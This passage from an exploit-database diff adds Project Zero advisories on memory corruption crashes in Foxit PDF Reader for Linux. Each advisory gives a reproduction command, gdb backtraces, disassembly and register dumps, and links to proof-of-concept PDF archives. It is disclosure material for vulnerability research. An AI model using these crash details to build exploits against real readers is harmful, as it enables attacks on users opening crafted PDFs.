../../Readerlite/ReaderLite/src/preview.cpp:1305 +#23 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#24 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#25 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#26 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#27 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#29 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#30 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#31 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#35 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () +---Type to continue, or q to quit--- + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#38 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#39 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#40 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#41 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#42 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#43 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#44 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#45 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#46 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#47 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#48 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#49 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#50 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#51 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#52 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so +#53 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#54 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#55 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#56 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#57 0x00007ffff633f96b in QEventLoop::exec(QFlags) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#58 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#59 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310 +(gdb) x/10i $rip +=> 0xab467f <_ZN14CFX_WideStringaSERKS_+51>: cmpq $0x0,0x0(%r13) + 0xab4684 <_ZN14CFX_WideStringaSERKS_+56>: js 0xab4692 <_ZN14CFX_WideStringaSERKS_+70> + 0xab4686 <_ZN14CFX_WideStringaSERKS_+58>: test %rbp,%rbp + 0xab4689 <_ZN14CFX_WideStringaSERKS_+61>: je 0xab46a3 <_ZN14CFX_WideStringaSERKS_+87> + 0xab468b <_ZN14CFX_WideStringaSERKS_+63>: cmpq $0x0,0x0(%rbp) + 0xab4690 <_ZN14CFX_WideStringaSERKS_+68>: jns 0xab46a3 <_ZN14CFX_WideStringaSERKS_+87> + 0xab4692 <_ZN14CFX_WideStringaSERKS_+70>: mov 0x8(%rbp),%esi + 0xab4695 <_ZN14CFX_WideStringaSERKS_+73>: lea 0x10(%rbp),%rdx + 0xab4699 <_ZN14CFX_WideStringaSERKS_+77>: mov %rbx,%rdi + 0xab469c <_ZN14CFX_WideStringaSERKS_+80>: callq 0xab45a8 <_ZN14CFX_WideString10AssignCopyEiPKw> +(gdb) info reg $r13 +r13 0x740000006e 498216206446 +--- cut --- + +Attached is a proof of concept PDF file. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39942.zip + diff --git a/platforms/linux/dos/39943.txt b/platforms/linux/dos/39943.txt new file mode 100755 index 000000000..a00d980d6 --- /dev/null +++ b/platforms/linux/dos/39943.txt @@ -0,0 +1,123 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=743 + +We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way: + +$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf + +The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too. + +An example excerpt from the crash log is as follows: + +--- cut --- +Program received signal SIGSEGV, Segmentation fault. +0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) () +(gdb) info reg $rdx +rdx 0x90ff9fc23e15101d -7998498756572671971 +(gdb) where +#0 0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) () +#1 0x0000000000922297 in kdu_supp::kdu_region_decompressor::start(kdu_core::kdu_codestream, kdu_supp::kdu_channel_mapping*, int, int, int, kdu_core::kdu_dims, kdu_core::kdu_coords, kdu_core::kdu_coords, bool, kdu_core::kdu_component_access_mode, bool, kdu_core::kdu_thread_env*, kdu_core::kdu_thread_queue*) () +#2 0x00000000008bd50d in CJPX_Decoder::Start(unsigned char*, int, int, unsigned char*) () +#3 0x00000000007f8d77 in CPDF_DIBSource::StartLoadJpxBitmap() () +#4 0x00000000007f9137 in CPDF_DIBSource::CreateDecoder() () +#5 0x00000000007fadb0 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) () +#6 0x00000000007f2f74 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) () +#7 0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) () +#8 0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) () +#9 0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) () +#10 0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() () +#11 0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) () +#12 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) () +#13 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) () +#14 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) () +#15 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) () +#16 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) () +#17 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) () +#18 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() () +#19 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) () +#20 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1946d30) + at ../../Readerlite/ReaderLite/src/preview.cpp:1305 +#21 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#22 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#23 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#24 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#25 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#27 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, Q---Type to continue, or q to quit--- +Region const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#35 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#37 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#38 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#39 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#40 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#41 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#42 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#43 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#44 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#45 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#46 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#47 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#48 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#49 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#50 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so +#51 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#52 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#53 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#54 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#55 0x00007ffff633f96b in QEventLoop::exec(QFlags) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#56 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#57 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310 +(gdb) x/10i $rip +=> 0x8ee95d <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+135>: mov 0x4(%rdx),%rcx + 0x8ee961 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+139>: mov %rcx,(%rbx) + 0x8ee964 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+142>: + movslq 0x320(%rax),%rcx + 0x8ee96b <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+149>: mov 0x4(%rbx),%esi + 0x8ee96e <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+152>: + movzbl 0x19(%rdx,%rcx,1),%ecx + 0x8ee973 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+157>: shl %cl,%esi + 0x8ee975 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+159>: + movslq 0x320(%rax),%rcx + 0x8ee97c <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+166>: mov %esi,0x4(%rbx) + 0x8ee97f <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+169>: + movzbl 0x3a(%rdx,%rcx,1),%ecx + 0x8ee984 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+174>: mov (%rbx),%edx +(gdb) info reg $rdx +rdx 0x90ff9fc23e15101d -7998498756572671971 +(gdb) x/10wx $dx +0x101d: Cannot access memory at address 0x101d +(gdb) x/10wx $rdx +0x90ff9fc23e15101d: Cannot access memory at address 0x90ff9fc23e15101d +--- cut --- + +Attached is a proof of concept PDF file. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39943.zip + diff --git a/platforms/linux/dos/39944.txt b/platforms/linux/dos/39944.txt new file mode 100755 index 000000000..9c001388b --- /dev/null +++ b/platforms/linux/dos/39944.txt @@ -0,0 +1,158 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=742 + +We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way: + +$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf + +The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too. + +An example excerpt from the crash log is as follows: + +--- cut --- +Program received signal SIGSEGV, Segmentation fault. +0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const () +(gdb) where +#0 0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const () +#1 0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const () +#2 0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const () +#3 0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const () +#4 0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) () +#5 0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) () +#6 0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) () +#7 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#8 0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#9 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#10 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#11 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#12 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#13 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) () +#14 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) () +#15 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) () +#16 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) () +#17 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) () +#18 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x1a1c3b0) + at ../../Readerlite/ReaderLite/src/childframe.cpp:91 +#19 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x194ce60) + at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61 +#20 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x14c5470, pdoc=0x193a720, + filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99 +#21 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x14c5470, csFilterName=..., + wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216 +#22 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x14a47e0, csFDFFile=...) + at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941 +#23 0x000000000043caac in CMainWindow::OpenFile (this=0x14c4240, fileName=...) + at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434 +#24 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:301 +(gdb) x/10i $rip +=> 0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94>: + mov 0x0(%r13,%rbp,8),%rcx + 0xaab971 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+99>: test %rcx,%rcx + 0xaab974 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+102>: + jne 0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117> + 0xaab976 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+104>: inc %rbp + 0xaab979 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+107>: movzbl 0xe(%rbx),%eax + 0xaab97d <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+111>: cmp %ebp,%eax + 0xaab97f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+113>: + jg 0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94> + 0xaab981 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+115>: + jmp 0xaab99f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+145> + 0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117>: mov 0xc(%rsp),%esi + 0xaab987 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+121>: mov %r15,%r9 +(gdb) info reg +rax 0x7c 124 +rbx 0x1a66130 27681072 +rcx 0xe1a704fcae02ca58 -2186773610767398312 +rdx 0x7fffffffceec 140737488342764 +rsi 0x2f 47 +rdi 0x1a66130 27681072 +rbp 0x0 0x0 +rsp 0x7fffffffce90 0x7fffffffce90 +r8 0xab0f92 11210642 +r9 0x6a83f4ca 1787032778 +r10 0xfd 253 +r11 0x0 0 +r12 0x7fffffffceec 140737488342764 +r13 0xe1a704fcae02ca58 -2186773610767398312 +r14 0xab0f92 11210642 +r15 0x6a83f4ca 1787032778 +rip 0xaab96c 0xaab96c +eflags 0x10202 [ IF RF ] +cs 0x33 51 +ss 0x2b 43 +ds 0x0 0 +es 0x0 0 +fs 0x0 0 +gs 0x0 0 +--- cut --- + +Attached are three proof of concept PDF files. + +There is another crash likely related to this issue: + +--- cut --- +Program received signal SIGSEGV, Segmentation fault. +0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) () +(gdb) where +#0 0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) () +#1 0x0000000000aab8e4 in CFX_BaseSegmentedArray::IterateSegment(unsigned char const*, int, int (*)(void*, void*), void*) const () +#2 0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const () +#3 0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const () +#4 0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const () +#5 0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) () +#6 0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) () +#7 0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) () +#8 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#9 0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#10 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#11 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#12 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#13 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#14 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) () +#15 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) () +#16 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) () +#17 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x196cf90) + at ../../Readerlite/ReaderLite/src/childframe.cpp:91 +x#18 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x191dce0) + at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61 